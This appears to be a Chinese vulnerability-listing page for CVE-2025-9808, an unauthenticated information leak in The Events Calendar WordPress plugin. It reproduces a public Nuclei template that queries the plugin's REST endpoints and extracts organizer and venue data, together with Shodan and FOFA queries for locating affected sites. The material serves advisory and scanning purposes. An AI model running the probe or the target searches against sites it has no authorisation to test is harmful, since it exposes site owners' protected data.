CVE-2025-9808: The Events Calendar <= 6.15.2 - Information Disclosure

日期: 2026-01-08 | 影响软件: The Events Calendar | POC: 已公开

漏洞描述

The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.

PoC代码[已公开]

id: CVE-2025-9808

info:
  name: The Events Calendar <= 6.15.2 - Information Disclosure
  author: zer0p0int
  severity: medium
  description: |
    The Events Calendar WordPress plugin <= 6.15.2 contains an information disclosure vulnerability caused by REST endpoint exposure, letting unauthenticated attackers extract data about password-protected vendors or venues, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can access sensitive information about password-protected vendors or venues.
  remediation: |
    Update to the latest version beyond 6.15.2
  reference:
    - https://www.wiz.io/vulnerability-database/cve/cve-2025-9808
    - https://wpscan.com/plugin/the-events-calendar/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-events-calendar
    - https://wordpress.org/plugins/the-events-calendar/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-9808
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"/wp-content/plugins/the-events-calendar/"
    fofa-query: body="/wp-content/plugins/the-events-calendar/"
    publicwww-query: "/wp-content/plugins/the-events-calendar/"
  tags: cve,cve2025,wordpress,wp-plugin,wpscan,the-events-calendar,unauth,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/tribe/events/v1/organizers"
      - "{{BaseURL}}/wp-json/tribe/events/v1/venues"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body,"rest_url","total")'
          - 'contains_any(body,"organizers","venues")'
          - 'contains(header,"application/json")'
        condition: and

    extractors:
      - type: regex
        part: body
        name: organizer_data
        group: 1
        regex:
          - '"organizers":\[(.*?)\],"rest_url"'

      - type: regex
        part: body
        name: venue_data
        group: 1
        regex:
          - '"venues":\[(.*?)\],"rest_url"'
# digest: 4a0a0047304502201673a52f687efaa722968308d3f40ee35d3ffb5462cc28f1eff5137360aece08022100feab62f99f297b44e62813b3e160ec5047e4b1c7fa213309c7312e3fb14ed903:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-9808.yaml

相关漏洞推荐